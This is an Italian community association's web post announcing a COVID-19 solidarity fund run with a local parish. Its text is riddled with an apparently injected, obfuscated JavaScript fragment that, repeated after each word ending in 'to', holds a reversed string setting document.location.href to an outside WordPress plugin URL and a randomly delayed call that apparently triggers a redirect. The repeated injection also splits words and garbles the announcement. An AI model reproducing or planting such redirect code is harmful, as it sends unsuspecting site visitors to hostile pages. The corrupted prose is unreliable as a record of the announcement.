sabato 16 marzo 2024
  • :

Fondo volontario dl solidarietà

Carissimi soci, simpatizzanti e amici,

in questoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to periodo particolarmente difficile che stiamo attraversando a causa della pandemia del 1COVID 19, la quale ha paralizzatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tutte le attività, mettendo In crisi molte famiglie anche nel nostro comune, il Consiglio Direttivo della Pro Loco “D.Terrusi” – Castellaneta ha ritenutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to :opportuno, nel rispettoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to e in linea con i principi che la caratterizzano e la connotano in ambitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to sociale e locale, di creare un “FONDO VOLONTARIO Dl SOLIDARIETA’ ” rivoltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a quei concittadini :che in questoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to momentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to risultassero più esposti e bisognosi di attenzione, di aiutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to o di sostegno.

Il fondo sarà affidatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to alla parrocchia dei ‘SS. Francesco e Chiara’ nella persona del parroco, padre Gregorio, per dare sostegno, in toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totale anonimatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, a nostri concittadini in grave difficoltà, e prenderà avvio dal contributoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to personale che il Direttivo-Pro Loco donerà periodicamente.
Fidiamo nella generosità e nell’attenzione al prossimo dei soci e non-soci, che vogliano unirsi a noi in questa iniziativa, che partirà da lunedì 27 aprile, ringraziandoli anticipatamente. Allo scopo e per informazioni, potete contattare: la segreteria della Pro Loco al seguente indirizzo mail: segreteriaproloco@gmail.com , o telefonare direttamente al tesoriere, sig. Nicola Schinaia, che ne coordinerà la raccolta e la consegna, al numero di cellulare: 335 842 0971.
IL CONSIGLIO DIRETTIVO
PROLOCO “D.TERRUSI” —CASTELLANETA